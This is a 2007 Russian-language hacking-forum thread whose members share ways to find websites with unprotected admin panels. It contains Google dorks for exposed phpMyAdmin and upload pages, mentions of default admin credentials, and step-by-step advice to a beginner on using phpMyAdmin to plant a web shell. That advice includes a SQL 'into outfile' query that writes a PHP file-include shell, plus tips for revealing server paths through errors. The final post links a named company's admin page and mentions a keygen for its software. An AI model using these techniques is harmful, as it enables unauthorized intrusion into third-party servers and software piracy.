Сайты с открытыми админками

Discussion in 'Уязвимости' started by mr.The, 9 May 2007.

  1. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,080
    Likes Received:
    456
    Reputations:
    38
    Ненашел похожей темы и решл создать. есть сайты админы которых полные ламеры и незащищают админки паролями. Предлагаю в этой теме давать ссылки на на сайты этих типов.

     
  2. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    inurl:/phpMyAdmin/main.php

    Вот тебе и список.
     
  3. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,080
    Likes Received:
    456
    Reputations:
    38
    невсегда так.
    иногда нужны более извращённые методы
     
  4. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    inurl:main.php Welcome to phpMyAdmin
     
  5. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Можно попробовать поискать /Ftp и /uploads , например, бывает что есть обычная html страничка с формой для отправки файла на сервер. Способ 2 нахождения админки( 5-8%)
    По дефолту стоит пароль и логин admin и т.п. Ну и оськомерц там вроде админка иногда без пасса или .htpasswd. Запрос для upload filetype:html inurl:uploads site:com!
     
  6. BromTyZ

    BromTyZ Member

    Joined:
    18 Mar 2007
    Messages:
    6
    Likes Received:
    5
    Reputations:
    0
    http://forum.antichat.ru/thread40031.html
    Заходим суда, тут сканер таких дир!
     
    1 person likes this.
  7. PahaN33

    PahaN33 New Member

    Joined:
    5 Apr 2007
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    обьясните новичку, как через пхпмуадмин, заливать файлы, на сервер... :(((( оч прошу помогите
     
    #7 PahaN33, 14 May 2007
    Last edited by a moderator: 14 May 2007
  8. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Вообще долго рассказывать, но например есть у тебя доступ в phpmyadmin(если есть базы). Изучаешь структуру баз(залей дамп всей или части базы на хард), затем можно просто либо проинклудить определенный параметр в таблицы определенной базы (смотри тему phpbb) либо создать файл(твой шелл), также если данная база, которую ты решил изучить имеет характер Скрипт-Галерея или какой-либо upload файлов различных расширений , что мешает добавить тот же *.php формат, дело вкуса! Удачи!
     
  9. p-range

    p-range Elder - Старейшина

    Joined:
    5 Feb 2006
    Messages:
    137
    Likes Received:
    145
    Reputations:
    118
    если есть права, выполняй запрос:
    Code:
    select '<?include($_GET[bravo])?>' from table into outfile '/patch/to/file.php';
     
  10. PahaN33

    PahaN33 New Member

    Joined:
    5 Apr 2007
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    2 p-range

    блин запрос выполняеться, но пишет что неможет создать файл. :(
     
  11. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Ты точно узнал путь на сервере в папке, где нужно создать шелл?
     
  12. p-range

    p-range Elder - Старейшина

    Joined:
    5 Feb 2006
    Messages:
    137
    Likes Received:
    145
    Reputations:
    118
    значит нет прав.
     
  13. PahaN33

    PahaN33 New Member

    Joined:
    5 Apr 2007
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Права скорей всего есть, надо просто узнать путь папки на сервере, а вот как?
    может можно както сгенерировать в phpmyadmin ошибку, что б выдало где находиться.. а?
     
  14. p-range

    p-range Elder - Старейшина

    Joined:
    5 Feb 2006
    Messages:
    137
    Likes Received:
    145
    Reputations:
    118
    ты сам ответил на свой вопрос. пытайся вызвать ошибку в скриптах
     
  15. Knight_of_Darkness

    Knight_of_Darkness Elder - Старейшина

    Joined:
    3 Feb 2007
    Messages:
    69
    Likes Received:
    68
    Reputations:
    24
    http://nevosoft.ru/admin.php =)

    лолы=)
    я к ихним гамам кейген сделал, кто до чего дойдет?